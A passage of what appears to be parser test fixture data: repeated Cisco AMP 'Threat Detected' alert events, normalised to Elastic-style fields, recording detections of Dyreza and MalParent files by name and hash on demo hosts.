true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258577620009042", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 637000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258577620009000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 230111, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:28.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258526080401489", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 609000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258526080401000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 231430, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:16.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258474540793936", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 987000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258474540794000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 232749, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:15:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258423001186383", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 959000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258423001186000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 234068, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542427", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 470000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 235387, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668099382575128", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 696000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668099382575000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 239357, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258371461578830", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 947000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258371461579000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 240676, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:41.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258324216938573", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 403000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258324216938000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 241995, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258272677331020", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 298000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258272677331000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 243314, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258221137723467", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 270000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258221137723000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 244633, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258169598115914", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 648000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258169598116000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 245952, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667841684537367", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 532000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 247271, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258118058508361", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 636000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258118058508000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 251240, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667837389570068", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 689000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667837389570000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 252559, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:41.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258066518900808", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 608000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258066518901000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 253878, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258014979293255", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 581000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258014979293000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 255197, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + 